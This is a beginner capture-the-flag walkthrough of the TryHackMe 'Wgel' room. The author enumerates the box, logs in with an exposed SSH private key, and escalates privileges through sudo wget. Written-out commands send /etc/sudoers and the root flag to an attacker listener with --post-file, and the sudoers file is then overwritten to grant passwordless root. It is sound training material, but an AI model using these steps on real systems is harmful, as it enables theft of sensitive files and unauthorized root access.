This post is a walkthrough to a beginner level box in TryHackMe — wget CTF, where you get both the initial user flag and the root flag. Link to the room: https://tryhackme.com/room/wgelctf.
Let’s get started. We will start with Enumerating the open ports, services using Nmap.
nmap -sV -sC -Pn -vv 10.10.52.93
- -sV is the flag for version
- Pn is a flag to consider all hosts are online
- -sC is to use the default Nmap scripts
- -vv is to show the verbose output of Nmap scan results
We can see port 22,80 are open. Let’s check the HTTP site.
It’s just a normal Apache2 page, let’s look at the source code and we got a commented line.
It did not make any sense to me. So I want to check the directories of this site using Gobuster with taking wordlist from dirbuster. Keep a note of the name we saw in the commented line, it might be useful later.
gobuster dir -u http://10.10.52.93/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
I got a directory /sitemap. Let’s check what does it contain. I have checked the source code and did not find any sensitive information apart from the website hosted vendor colorlib.com. Let’s run gobuster again to see if we can find something useful.
Ohhh, looks like we got something related to SSH. When I accessed the site, I can see an ssh key available. Let’s grab it and try to get an ssh session.
I have downloaded the file and see what does it contains. It shows that it is an RSA private key and I thought to check the permissions. It shows that everyone has read access to it and I have changed it to the only user Read/Write access.
To get the SSH session we need a username to connect with this key. I remember when I am going through the initial HTML source code page, there was a name commented there (Jessie). I am going to use that name as the username.
Hoo Hoo, We got the SSH access. Let’s explore it to get our flags.
Hurrah! I got the first flag. Instead of searching directory by directory, I am using one shortcut to search file which contains a flag using the locate command.
Now find our next flag (root).
We can see that Sudo can only run with wget command. To obtain our second flag we use wget with the parameter
--post-filewith the file path and towards the IP where we want to send the file. We put Netcat (local) listening on port 80.
sudo /usr/bin/wget --post-file=<path of file> <Listening IP>
Hurrah!!! I got the second flag too. Here I used the privilege escalation method to extract the flag instead of gaining the root access.
Gaining Root Shell:
We were able to fulfill our task by getting a root flag on this machine. But our task will be complete when we get a root shell. Let’s try to exploit wget to achieve this. I googled about this for a while and got something from hacking articles.
We have so many uses with wget but for now, I am going to use only two flags for this task.
— post-file: This flag is used to send the content of the file to a remote location and the destination and receive this by setting up a listener.
— output-document: This flag is used to overwrite the data which we receive from the webserver using a GET request.
I am going to send the content to the sudoers file to my machine by below syntax and I will set up an HTTP listener too.
sudo wget --post-file=/etc/sudoers <listener IP>
If you see the above image, I have sent the content of the sudoers file to my machine using wget( left side)and initiated a listener to receive the information. I got all the content in the sudoers including the permissions of Jessie’s account( Right side).
Now, I will modify Jessie’s account permissions by commenting/erasing existing content and add the below line.
#jessie ALL=(root) NOPASSWD: /usr/bin/wget
jessie ALL=(ALL) NOPASSWD: ALL
Now, I will start a simple HTTP server using python and I will use wget from Jessie’s machine, send a GET request to request the sudoers file from the remote server, use the — output-document flag to replace the content which we want to modify( Here I am going to modify the suoders file in /etc directory).
Hurrah!!… We got the root shell. This is how we can do the privilege escalation using wget
I would like to thanks MrSeth6797 for creating this room and giving us an opportunity to learn some new methods and techniques to improve our skills.
Thanks for reading this….